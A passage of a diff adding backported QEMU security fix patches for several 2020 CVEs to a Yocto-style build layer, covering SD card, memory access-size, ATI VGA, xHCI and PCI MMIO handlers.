117 /* Writing in SPI mode not implemented. */
118 if (sd->spi)
119 break;
120+
121+ if (addr + sd->blk_len > sd->size) {
122+ sd->card_status |= ADDRESS_ERROR;
123+ return sd_r1;
124+ }
125+
126 sd->state = sd_receivingdata_state;
127 sd->data_start = addr;
128 sd->data_offset = 0;
129 sd->blk_written = 0;
130
131- if (sd->data_start + sd->blk_len > sd->size) {
132- sd->card_status |= ADDRESS_ERROR;
133- }
134 if (sd_wp_addr(sd, sd->data_start)) {
135 sd->card_status |= WP_VIOLATION;
136 }
137--
1382.32.0
139
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
new file mode 100644
index 0000000000..ffce610f79
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
@@ -0,0 +1,54 @@
1From 9157dd597d293ab7f599f4d96c3fe8a6e07c633d Mon Sep 17 00:00:00 2001
2From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Wed, 3 Jun 2020 19:59:16 +0200
4Subject: [PATCH] hw/sd/sdcard: Restrict Class 6 commands to SCSD cards
5MIME-Version: 1.0
6Content-Type: text/plain; charset=utf8
7Content-Transfer-Encoding: 8bit
8
9Only SCSD cards support Class 6 (Block Oriented Write Protection)
10commands.
11
12 "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
13
14 4.3.14 Command Functional Difference in Card Capacity Types
15
16 * Write Protected Group
17
18 SDHC and SDXC do not support write-protected groups. Issuing
19 CMD28, CMD29 and CMD30 generates the ILLEGAL_COMMAND error.
20
21Cc: qemu-stable@nongnu.org
22Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
23Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
24Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
25Message-Id: <20200630133912.9428-7-f4bug@amsat.org>
26
27Upstram-Status: Backport:
28https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d
29
30CVE: CVE-2020-13253
31
32Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
33---
34 hw/sd/sd.c | 5 +++++
35 1 file changed, 5 insertions(+)
36
37diff --git a/hw/sd/sd.c b/hw/sd/sd.c
38index 5137168..1cc16bf 100644
39--- a/hw/sd/sd.c
40+++ b/hw/sd/sd.c
41@@ -920,6 +920,11 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
42 sd->multi_blk_cnt = 0;
43 }
44
45+ if (sd_cmd_class[req.cmd] == 6 && FIELD_EX32(sd->ocr, OCR, CARD_CAPACITY)) {
46+ /* Only Standard Capacity cards support class 6 commands */
47+ return sd_illegal;
48+ }
49+
50 switch (req.cmd) {
51 /* Basic commands (Class 0 and Class 1) */
52 case 0: /* CMD0: GO_IDLE_STATE */
53--
541.8.3.1
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
new file mode 100644
index 0000000000..fdfff9d81d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
@@ -0,0 +1,91 @@
1From 5d971f9e672507210e77d020d89e0e89165c8fc9 Mon Sep 17 00:00:00 2001
2From: "Michael S. Tsirkin" <mst@redhat.com>
3Date: Wed, 10 Jun 2020 09:47:49 -0400
4Subject: [PATCH] memory: Revert "memory: accept mismatching sizes in
5 memory_region_access_valid"
6
7Memory API documentation documents valid .min_access_size and .max_access_size
8fields and explains that any access outside these boundaries is blocked.
9
10This is what devices seem to assume.
11
12However this is not what the implementation does: it simply
13ignores the boundaries unless there's an "accepts" callback.
14
15Naturally, this breaks a bunch of devices.
16
17Revert to the documented behaviour.
18
19Devices that want to allow any access can just drop the valid field,
20or add the impl field to have accesses converted to appropriate
21length.
22
23Cc: qemu-stable@nongnu.org
24Reviewed-by: Richard Henderson <rth@twiddle.net>
25Fixes: CVE-2020-13754
26Fixes: https://bugzilla.redhat.com/show_bug.cgi?id=1842363
27Fixes: a014ed07bd5a ("memory: accept mismatching sizes in memory_region_access_valid")
28Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
29Message-Id: <20200610134731.1514409-1-mst@redhat.com>
30Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
31
32https://git.qemu.org/?p=qemu.git;a=patch;h=5d971f9e672507210e77d020d89e0e89165c8fc9
33CVE: CVE-2020-13754
34Upstream-Status: Backport
35Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
36---
37 memory.c | 29 +++++++++--------------------
38 1 file changed, 9 insertions(+), 20 deletions(-)
39
40diff --git a/memory.c b/memory.c
41index 2f15a4b..9200b20 100644
42--- a/memory.c
43+++ b/memory.c
44@@ -1352,35 +1352,24 @@ bool memory_region_access_valid(MemoryRegion *mr,
45 bool is_write,
46 MemTxAttrs attrs)
47 {
48- int access_size_min, access_size_max;
49- int access_size, i;
50-
51- if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
52+ if (mr->ops->valid.accepts
53+ && !mr->ops->valid.accepts(mr->opaque, addr, size, is_write, attrs)) {
54 return false;
55 }
56
57- if (!mr->ops->valid.accepts) {
58- return true;
59- }
60-
61- access_size_min = mr->ops->valid.min_access_size;
62- if (!mr->ops->valid.min_access_size) {
63- access_size_min = 1;
64+ if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
65+ return false;
66 }
67
68- access_size_max = mr->ops->valid.max_access_size;
69+ /* Treat zero as compatibility all valid */
70 if (!mr->ops->valid.max_access_size) {
71- access_size_max = 4;
72+ return true;
73 }
74
75- access_size = MAX(MIN(size, access_size_max), access_size_min);
76- for (i = 0; i < size; i += access_size) {
77- if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size,
78- is_write, attrs)) {
79- return false;
80- }
81+ if (size > mr->ops->valid.max_access_size
82+ || size < mr->ops->valid.min_access_size) {
83+ return false;
84 }
85-
86 return true;
87 }
88
89--
901.8.3.1
91
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
new file mode 100644
index 0000000000..7354edc54d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
@@ -0,0 +1,69 @@
1From dba04c3488c4699f5afe96f66e448b1d447cf3fb Mon Sep 17 00:00:00 2001
2From: Michael Tokarev <mjt@tls.msk.ru>
3Date: Mon, 20 Jul 2020 19:06:27 +0300
4Subject: [PATCH] acpi: accept byte and word access to core ACPI registers
5
6All ISA registers should be accessible as bytes, words or dwords
7(if wide enough). Fix the access constraints for acpi-pm-evt,
8acpi-pm-tmr & acpi-cnt registers.
9
10Fixes: 5d971f9e67 (memory: Revert "memory: accept mismatching sizes in memory_region_access_valid")
11Fixes: afafe4bbe0 (apci: switch cnt to memory api)
12Fixes: 77d58b1e47 (apci: switch timer to memory api)
13Fixes: b5a7c024d2 (apci: switch evt to memory api)
14Buglink: https://lore.kernel.org/xen-devel/20200630170913.123646-1-anthony.perard@citrix.com/T/
15Buglink: https://bugs.debian.org/964793
16BugLink: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964247
17BugLink: https://bugs.launchpad.net/bugs/1886318
18Reported-By: Simon John <git@the-jedi.co.uk>
19Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
20Message-Id: <20200720160627.15491-1-mjt@msgid.tls.msk.ru>
21Cc: qemu-stable@nongnu.org
22Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
23Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
24
25https://git.qemu.org/?p=qemu.git;a=patch;h=dba04c3488c4699f5afe96f66e448b1d447cf3fb
26CVE: CVE-2020-13754
27Upstream-Status: Backport
28Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
29---
30 hw/acpi/core.c | 9 ++++++---
31 1 file changed, 6 insertions(+), 3 deletions(-)
32
33diff --git a/hw/acpi/core.c b/hw/acpi/core.c
34index f6d9ec4..ac06db3 100644
35--- a/hw/acpi/core.c
36+++ b/hw/acpi/core.c
37@@ -458,7 +458,8 @@ static void acpi_pm_evt_write(void *opaque, hwaddr addr, uint64_t val,
38 static const MemoryRegionOps acpi_pm_evt_ops = {
39 .read = acpi_pm_evt_read,
40 .write = acpi_pm_evt_write,
41- .valid.min_access_size = 2,
42+ .impl.min_access_size = 2,
43+ .valid.min_access_size = 1,
44 .valid.max_access_size = 2,
45 .endianness = DEVICE_LITTLE_ENDIAN,
46 };
47@@ -527,7 +528,8 @@ static void acpi_pm_tmr_write(void *opaque, hwaddr addr, uint64_t val,
48 static const MemoryRegionOps acpi_pm_tmr_ops = {
49 .read = acpi_pm_tmr_read,
50 .write = acpi_pm_tmr_write,
51- .valid.min_access_size = 4,
52+ .impl.min_access_size = 4,
53+ .valid.min_access_size = 1,
54 .valid.max_access_size = 4,
55 .endianness = DEVICE_LITTLE_ENDIAN,
56 };
57@@ -599,7 +601,8 @@ static void acpi_pm_cnt_write(void *opaque, hwaddr addr, uint64_t val,
58 static const MemoryRegionOps acpi_pm_cnt_ops = {
59 .read = acpi_pm_cnt_read,
60 .write = acpi_pm_cnt_write,
61- .valid.min_access_size = 2,
62+ .impl.min_access_size = 2,
63+ .valid.min_access_size = 1,
64 .valid.max_access_size = 2,
65 .endianness = DEVICE_LITTLE_ENDIAN,
66 };
67--
681.8.3.1
69
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
new file mode 100644
index 0000000000..2a8781050f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
@@ -0,0 +1,65 @@
1From 8e67fda2dd6202ccec093fda561107ba14830a17 Mon Sep 17 00:00:00 2001
2From: Laurent Vivier <lvivier@redhat.com>
3Date: Tue, 21 Jul 2020 10:33:22 +0200
4Subject: [PATCH] xhci: fix valid.max_access_size to access address registers
5MIME-Version: 1.0
6Content-Type: text/plain; charset=utf8
7Content-Transfer-Encoding: 8bit
8
9QEMU XHCI advertises AC64 (64-bit addressing) but doesn't allow
1064-bit mode access in "runtime" and "operational" MemoryRegionOps.
11
12Set the max_access_size based on sizeof(dma_addr_t) as AC64 is set.
13
14XHCI specs:
15"If the xHC supports 64-bit addressing (AC64 = â1â), then software
16should write 64-bit registers using only Qword accesses. If a
17system is incapable of issuing Qword accesses, then writes to the
1864-bit address fields shall be performed using 2 Dword accesses;
19low Dword-first, high-Dword second. If the xHC supports 32-bit
20addressing (AC64 = â0â), then the high Dword of registers containing
2164-bit address fields are unused and software should write addresses
22using only Dword accesses"
23
24The problem has been detected with SLOF, as linux kernel always accesses
25registers using 32-bit access even if AC64 is set and revealed by
265d971f9e6725 ("memory: Revert "memory: accept mismatching sizes in memory_region_access_valid"")
27
28Suggested-by: Alexey Kardashevskiy <aik@au1.ibm.com>
29Signed-off-by: Laurent Vivier <lvivier@redhat.com>
30Message-id: 20200721083322.90651-1-lvivier@redhat.com
31Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
32
33https://git.qemu.org/?p=qemu.git;a=patch;h=8e67fda2dd6202ccec093fda561107ba14830a17
34CVE: CVE-2020-13754
35Upstream-Status: Backport
36Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
37---
38 hw/usb/hcd-xhci.c | 4 ++--
39 1 file changed, 2 insertions(+), 2 deletions(-)
40
41diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
42index b330e36..67a18fe 100644
43--- a/hw/usb/hcd-xhci.c
44+++ b/hw/usb/hcd-xhci.c
45@@ -3184,7 +3184,7 @@ static const MemoryRegionOps xhci_oper_ops = {
46 .read = xhci_oper_read,
47 .write = xhci_oper_write,
48 .valid.min_access_size = 4,
49- .valid.max_access_size = 4,
50+ .valid.max_access_size = sizeof(dma_addr_t),
51 .endianness = DEVICE_LITTLE_ENDIAN,
52 };
53
54@@ -3200,7 +3200,7 @@ static const MemoryRegionOps xhci_runtime_ops = {
55 .read = xhci_runtime_read,
56 .write = xhci_runtime_write,
57 .valid.min_access_size = 4,
58- .valid.max_access_size = 4,
59+ .valid.max_access_size = sizeof(dma_addr_t),
60 .endianness = DEVICE_LITTLE_ENDIAN,
61 };
62
63--
641.8.3.1
65
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
new file mode 100644
index 0000000000..6bad07d03f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
@@ -0,0 +1,39 @@
1From 70b78d4e71494c90d2ccb40381336bc9b9a22f79 Mon Sep 17 00:00:00 2001
2From: Alistair Francis <alistair.francis@wdc.com>
3Date: Tue, 30 Jun 2020 13:12:11 -0700
4Subject: [PATCH] hw/riscv: Allow 64 bit access to SiFive CLINT
5
6Commit 5d971f9e672507210e77d020d89e0e89165c8fc9
7"memory: Revert "memory: accept mismatching sizes in
8memory_region_access_valid"" broke most RISC-V boards as they do 64 bit
9accesses to the CLINT and QEMU would trigger a fault. Fix this failure
10by allowing 8 byte accesses.
11
12Signed-off-by: Alistair Francis <alistair.francis@wdc.com>
13Reviewed-by: LIU Zhiwei<zhiwei_liu@c-sky.com>
14Message-Id: <122b78825b077e4dfd39b444d3a46fe894a7804c.1593547870.git.alistair.francis@wdc.com>
15
16https://git.qemu.org/?p=qemu.git;a=patch;h=70b78d4e71494c90d2ccb40381336bc9b9a22f79
17CVE: CVE-2020-13754
18Upstream-Status: Backport
19Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
20---
21 hw/riscv/sifive_clint.c | 2 +-
22 1 file changed, 1 insertion(+), 1 deletion(-)
23
24diff --git a/hw/riscv/sifive_clint.c b/hw/riscv/sifive_clint.c
25index b11ffa0..669c21a 100644
26--- a/hw/riscv/sifive_clint.c
27+++ b/hw/riscv/sifive_clint.c
28@@ -181,7 +181,7 @@ static const MemoryRegionOps sifive_clint_ops = {
29 .endianness = DEVICE_LITTLE_ENDIAN,
30 .valid = {
31 .min_access_size = 4,
32- .max_access_size = 4
33+ .max_access_size = 8
34 }
35 };
36
37--
381.8.3.1
39
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
new file mode 100644
index 0000000000..1e8278f7b7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
@@ -0,0 +1,44 @@
1Date: Thu, 4 Jun 2020 16:25:24 +0530
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Subject: [PATCH v3] ati-vga: check address before reading configuration bytes (CVE-2020-13791)
4
5While reading PCI configuration bytes, a guest may send an
6address towards the end of the configuration space. It may lead
7to an OOB access issue. Add check to ensure 'address + size' is
8within PCI configuration space.
9
10CVE: CVE-2020-13791
11
12Upstream-Status: Submitted
13https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00979.html
14
15Reported-by: Ren Ding <rding@gatech.edu>
16Reported-by: Hanqing Zhao <hanqing@gatech.edu>
17Reported-by: Yi Ren <c4tren@gmail.com>
18Suggested-by: BALATON Zoltan <balaton@eik.bme.hu>
19Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
20Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
21---
22 hw/display/ati.c | 4 +++-
23 1 file changed, 3 insertions(+), 1 deletion(-)
24
25Update v3: avoid modifying 'addr' variable
26 -> https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00834.html
27
28diff --git a/hw/display/ati.c b/hw/display/ati.c
29index 67604e68de..b4d0fd88b7 100644
30--- a/hw/display/ati.c
31+++ b/hw/display/ati.c
32@@ -387,7 +387,9 @@ static uint64_t ati_mm_read(void *opaque, hwaddr addr, unsigned int size)
33 val = s->regs.crtc_pitch;
34 break;
35 case 0xf00 ... 0xfff:
36- val = pci_default_read_config(&s->dev, addr - 0xf00, size);
37+ if ((addr - 0xf00) + size <= pci_config_size(&s->dev)) {
38+ val = pci_default_read_config(&s->dev, addr - 0xf00, size);
39+ }
40 break;
41 case CUR_OFFSET:
42 val = s->regs.cur_offset;
43--
442.26.2
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
new file mode 100644
index 0000000000..20f39f0a26
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
@@ -0,0 +1,50 @@
1From 520f26fc6d17b71a43eaf620e834b3bdf316f3d3 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:25 +0530
4Subject: [PATCH] hw/pci-host: add pci-intack write method
5
6Add pci-intack mmio write method to avoid NULL pointer dereference
7issue.
8
9Reported-by: Lei Sun <slei.casper@gmail.com>
10Reviewed-by: Li Qiang <liq3ea@gmail.com>
11Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
12Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
13Message-Id: <20200811114133.672647-2-ppandit@redhat.com>
14Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
15
16CVE: CVE-2020-15469
17Upstream-Status: Backport [import from ubuntu
18https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-1.patch?h=ubuntu/focal-security
19Upstream commit https://github.com/qemu/qemu/commit/520f26fc6d17b71a43eaf620e834b3bdf316f3d3 ]
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21---
22 hw/pci-host/prep.c | 8 ++++++++
23 1 file changed, 8 insertions(+)
24
25--- a/hw/pci-host/prep.c
26+++ b/hw/pci-host/prep.c
27@@ -26,6 +26,7 @@
28 #include "qemu/osdep.h"
29 #include "qemu-common.h"
30 #include "qemu/units.h"
31+#include "qemu/log.h"
32 #include "qapi/error.h"
33 #include "hw/pci/pci.h"
34 #include "hw/pci/pci_bus.h"
35@@ -119,8 +120,15 @@ static uint64_t raven_intack_read(void *
36 return pic_read_irq(isa_pic);
37 }
38
39+static void raven_intack_write(void *opaque, hwaddr addr,
40+ uint64_t data, unsigned size)
41+{
42+ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
43+}
44+
45 static const MemoryRegionOps raven_intack_ops = {
46 .read = raven_intack_read,
47+ .write = raven_intack_write,
48 .valid = {
49 .max_access_size = 1,
50 },
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
new file mode 100644
index 0000000000..d6715d337c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
@@ -0,0 +1,69 @@
1From 4f2a5202a05fc1612954804a2482f07bff105ea2 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:26 +0530
4Subject: [PATCH] pci-host: designware: add pcie-msi read method
5
6Add pcie-msi mmio read method to avoid NULL pointer dereference
7issue.
8
9Reported-by: Lei Sun <slei.casper@gmail.com>
10Reviewed-by: Li Qiang <liq3ea@gmail.com>
11Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
12Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
13Message-Id: <20200811114133.672647-3-ppandit@redhat.com>
14Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
15
16CVE: CVE-2020-15469
17Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-2.patch?h=ubuntu/focal-security Upstream Commit https://github.com/qemu/qemu/commit/4f2a5202a05fc1612954804a2482f07bff105ea2]
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 hw/pci-host/designware.c | 19 +++++++++++++++++++
21 1 file changed, 19 insertions(+)
22
23diff --git a/hw/pci-host/designware.c b/hw/pci-host/designware.c
24index f9fb97a..bde3a34 100644
25--- a/hw/pci-host/designware.c
26+++ b/hw/pci-host/designware.c
27@@ -21,6 +21,7 @@
28 #include "qemu/osdep.h"
29 #include "qapi/error.h"
30 #include "qemu/module.h"
31+#include "qemu/log.h"
32 #include "hw/pci/msi.h"
33 #include "hw/pci/pci_bridge.h"
34 #include "hw/pci/pci_host.h"
35@@ -63,6 +64,23 @@ designware_pcie_root_to_host(DesignwarePCIERoot *root)
36 return DESIGNWARE_PCIE_HOST(bus->parent);
37 }
38
39+static uint64_t designware_pcie_root_msi_read(void *opaque, hwaddr addr,
40+ unsigned size)
41+{
42+ /*
43+ * Attempts to read from the MSI address are undefined in
44+ * the PCI specifications. For this hardware, the datasheet
45+ * specifies that a read from the magic address is simply not
46+ * intercepted by the MSI controller, and will go out to the
47+ * AHB/AXI bus like any other PCI-device-initiated DMA read.
48+ * This is not trivial to implement in QEMU, so since
49+ * well-behaved guests won't ever ask a PCI device to DMA from
50+ * this address we just log the missing functionality.
51+ */
52+ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
53+ return 0;
54+}
55+
56 static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
57 uint64_t val, unsigned len)
58 {
59@@ -77,6 +95,7 @@ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
60 }
61
62 static const MemoryRegionOps designware_pci_host_msi_ops = {
63+ .read = designware_pcie_root_msi_read,
64 .write = designware_pcie_root_msi_write,
65 .endianness = DEVICE_LITTLE_ENDIAN,
66 .valid = {
67--
681.8.3.1
69
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
new file mode 100644
index 0000000000..85abe8ff32
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
@@ -0,0 +1,49 @@
1From 24202d2b561c3b4c48bd28383c8c34b4ac66c2bf Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:27 +0530
4Subject: [PATCH] vfio: add quirk device write method
5
6Add vfio quirk device mmio write method to avoid NULL pointer
7dereference issue.
8
9Reported-by: Lei Sun <slei.casper@gmail.com>
10Reviewed-by: Li Qiang <liq3ea@gmail.com>
11Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
12Acked-by: Alex Williamson <alex.williamson@redhat.com>
13Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
14Message-Id: <20200811114133.672647-4-ppandit@redhat.com>
15Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
16
17CVE: CVE-2020-15469
18Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/24202d2b561c3b4c48bd28383c8c34b4ac66c2bf]
19Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
20---
21 hw/vfio/pci-quirks.c | 8 ++++++++
22 1 file changed, 8 insertions(+)
23
24--- a/hw/vfio/pci-quirks.c
25+++ b/hw/vfio/pci-quirks.c
26@@ -13,6 +13,7 @@
27 #include "qemu/osdep.h"
28 #include "exec/memop.h"
29 #include "qemu/units.h"
30+#include "qemu/log.h"
31 #include "qemu/error-report.h"
32 #include "qemu/main-loop.h"
33 #include "qemu/module.h"
34@@ -278,8 +279,15 @@ static uint64_t vfio_ati_3c3_quirk_read(
35 return data;
36 }
37
38+static void vfio_ati_3c3_quirk_write(void *opaque, hwaddr addr,
39+ uint64_t data, unsigned size)
40+{
41+ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
42+}
43+
44 static const MemoryRegionOps vfio_ati_3c3_quirk = {
45 .read = vfio_ati_3c3_quirk_read,
46+ .write = vfio_ati_3c3_quirk_write,
47 .endianness = DEVICE_LITTLE_ENDIAN,
48 };
49
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
new file mode 100644
index 0000000000..52fac8a051
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
@@ -0,0 +1,53 @@
1From f867cebaedbc9c43189f102e4cdfdff05e88df7f Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:28 +0530
4Subject: [PATCH] prep: add ppc-parity write method
5
6Add ppc-parity mmio write method to avoid NULL pointer dereference
7issue.
8
9Reported-by: Lei Sun <slei.casper@gmail.com>
10Acked-by: David Gibson <david@gibson.dropbear.id.au>
11Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
12Reviewed-by: Li Qiang <liq3ea@gmail.com>
13Message-Id: <20200811114133.672647-5-ppandit@redhat.com>
14Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
15
16CVE: CVE-2020-15469
17Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/f867cebaedbc9c43189f102e4cdfdff05e88df7f]
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 hw/ppc/prep_systemio.c | 8 ++++++++
21 1 file changed, 8 insertions(+)
22
23diff --git a/hw/ppc/prep_systemio.c b/hw/ppc/prep_systemio.c
24index 4e48ef2..b2bd783 100644
25--- a/hw/ppc/prep_systemio.c
26+++ b/hw/ppc/prep_systemio.c
27@@ -23,6 +23,7 @@
28 */
29
30 #include "qemu/osdep.h"
31+#include "qemu/log.h"
32 #include "hw/irq.h"
33 #include "hw/isa/isa.h"
34 #include "hw/qdev-properties.h"
35@@ -235,8 +236,15 @@ static uint64_t ppc_parity_error_readl(void *opaque, hwaddr addr,
36 return val;
37 }
38
39+static void ppc_parity_error_writel(void *opaque, hwaddr addr,
40+ uint64_t data, unsigned size)
41+{
42+ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
43+}
44+
45 static const MemoryRegionOps ppc_parity_error_ops = {
46 .read = ppc_parity_error_readl,
47+ .write = ppc_parity_error_writel,
48 .valid = {
49 .min_access_size = 4,
50 .max_access_size = 4,
51--
521.8.3.1
53
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
new file mode 100644
index 0000000000..49c6c5e3e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
@@ -0,0 +1,53 @@
1From b5bf601f364e1a14ca4c3276f88dfec024acf613 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:29 +0530
4Subject: [PATCH] nvram: add nrf51_soc flash read method
5
6Add nrf51_soc mmio read method to avoid NULL pointer dereference
7issue.
8
9Reported-by: Lei Sun <slei.casper@gmail.com>
10Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
11Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
12Reviewed-by: Li Qiang <liq3ea@gmail.com>
13Message-Id: <20200811114133.672647-6-ppandit@redhat.com>
14Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
15
16CVE: CVE-2020-15469
17Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b5bf601f364e1a14ca4c3276f88dfec024acf613 ]
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 hw/nvram/nrf51_nvm.c | 10 ++++++++++
21 1 file changed, 10 insertions(+)
22
23diff --git a/hw/nvram/nrf51_nvm.c b/hw/nvram/nrf51_nvm.c
24index f2283c1..7b3460d 100644
25--- a/hw/nvram/nrf51_nvm.c
26+++ b/hw/nvram/nrf51_nvm.c
27@@ -273,6 +273,15 @@ static const MemoryRegionOps io_ops = {
28 .endianness = DEVICE_LITTLE_ENDIAN,
29 };
30
31+static uint64_t flash_read(void *opaque, hwaddr offset, unsigned size)
32+{
33+ /*
34+ * This is a rom_device MemoryRegion which is always in
35+ * romd_mode (we never put it in MMIO mode), so reads always
36+ * go directly to RAM and never come here.
37+ */
38+ g_assert_not_reached();
39+}
40
41 static void flash_write(void *opaque, hwaddr offset, uint64_t value,
42 unsigned int size)
43@@ -300,6 +309,7 @@ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
44
45
46 static const MemoryRegionOps flash_ops = {
47+ .read = flash_read,
48 .write = flash_write,
49 .valid.min_access_size = 4,
50 .valid.max_access_size = 4,
51--
521.8.3.1
53
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
new file mode 100644
index 0000000000..115be68295
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
@@ -0,0 +1,61 @@
1Backport of:
2
3From 921604e175b8ec06c39503310e7b3ec1e3eafe9e Mon Sep 17 00:00:00 2001
4From: Prasad J Pandit <pjp@fedoraproject.org>
5Date: Tue, 11 Aug 2020 17:11:30 +0530
6Subject: [PATCH] spapr_pci: add spapr msi read method
7
8Add spapr msi mmio read method to avoid NULL pointer dereference
9issue.
10
11Reported-by: Lei Sun <slei.casper@gmail.com>
